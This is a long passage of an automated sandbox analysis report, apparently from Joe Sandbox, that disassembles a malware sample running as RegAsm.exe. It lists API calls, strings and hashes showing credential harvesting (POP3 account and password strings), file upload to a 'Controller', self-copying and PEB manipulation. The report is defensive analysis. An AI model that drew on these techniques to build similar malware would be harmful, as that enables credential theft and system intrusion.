                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                                                                                  Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Write$Create
                                                                                                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                                                                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                                                                                  Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                  • API String ID: 1646373207-255920310
                                                                                                                                                                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                                                                                  Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                  • API String ID: 4218353326-3023110444
                                                                                                                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                  Function 00445DD7 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2509303402-2084328917
                                                                                                                                                                                                  • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                                                                  Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                                                                                                  • API String ID: 1579085052-2309681474
                                                                                                                                                                                                  • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                                                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                                                                                  Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                  • API String ID: 3941738427-1684325040
                                                                                                                                                                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                                                                                  Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                                  Function 0044F4AD Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1464849758-0
                                                                                                                                                                                                  • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                                                                                  Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                                  • API String ID: 1332880857-3714951968
                                                                                                                                                                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                                                                                  Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                                  • String ID: Close
                                                                                                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                                                                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                                                                                  Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                                                                  • API String ID: 3086580692-2582957567
                                                                                                                                                                                                  • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                                                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                                                                                  Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
